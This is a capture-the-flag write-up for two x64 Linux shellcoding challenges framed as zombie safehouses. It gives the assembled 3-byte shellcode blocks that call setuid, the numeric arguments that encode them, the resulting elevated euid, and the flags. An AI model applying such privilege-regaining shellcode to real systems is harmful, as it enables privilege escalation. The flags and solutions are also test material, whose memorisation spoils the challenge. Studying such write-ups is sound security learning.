14 – Safehouse
It’s the middle of the night. Nothing but complete darkness and the moaing of approaching zombies surrounds you. You need to escape. Fast. There seems to be nothing to hide and nowhere to run. But then – a small dancing gleam appears while you are running through the blackness. Could it be? Yes – it looks like the light of a safehouse, now a few meters away. You need to get in, you need to survive. But it’s locked. Looks like you need a special knocking sequence to enter. But how to get it? You have to be fast to get into safety. The Zombies are getting closer …
15 – Secure Safehouse
It’s past midnight now. The zombies managed to invade your safehouse and you needed to escape. Again. Seems like the imprudent security measures had their price. But there is hope! Rumor has it there’s another safehouse which proves to be more secure, employing security measures no zombie would ever figure out. But can you?
Summary: x64 shellcoding
This x64 linux binary is quite simple. First, it drops effective privilegies. We can regain them, but only if we’ll do setuid before execve.
Then, it allocates an ‘rwx‘ area and copies there 5 qwords (actually 4 dwords + 1 qword because they overlap).
Qwords are taken from strtoul(argv[i]).
Each 4th byte of each qword is then set to 0xc3 (ret opcode).
Then the code is executed – each dword one time. After it we get shell.
So, we need to write at max 6 blocks of 3-byte shellcodes to do setuid(1006):
mov ah, 0x03 ; high byte of 1006 nop db 0xc3 mov al, 0xee ; low byte of 1006 nop db 0xc3 push byte 0x69 ; sys_setuid pop rbx db 0xc3 xchg eax, edi jmp metka db 0xc3 metka: xchg eax, ebx syscall db 0xc3
$ ./safehouse 948 61104 5990762 125847 331667 $ id uid=1000(ctf) gid=1000(ctf) euid=1006(safehouse) groups=1006,1000(ctf) $ cat FLAG FUNNY_C3_LOOP_MAKES_ZOMBIES_BUTTHURT
Here the code is the same, but only the first dword is run, once. Also there’s a check:
(eax == argc - 1)
So we replace
nop; ret with
mov dl, 0xc3 and also fix eax in the end:
mov ah, 0x03 ; 1005 high byte mov dl, 0xc3 ; B2C3 opcode mov al, 0xed ; 1005 low byte mov dl, 0xc3 mov cl, 0x69 ; sys_setuid mov dl, 0xc3 xchg eax, edi xchg eax, ecx mov dl, 0xc3 ; qword syscall ; 0F05 opcode mov dl, 0xc3 mov al, 5 ; to match argc ret ; C3
$ ./secure-safehouse 11666356 11726256 11692465 11702679 54893877214184719 $ id uid=1000(ctf) gid=1000(ctf) euid=1005(secure_safehouse) groups=1005,1000(ctf) $ cat FLAG JOO_ARE_NOW_SUPER_LEET_C3_HECKER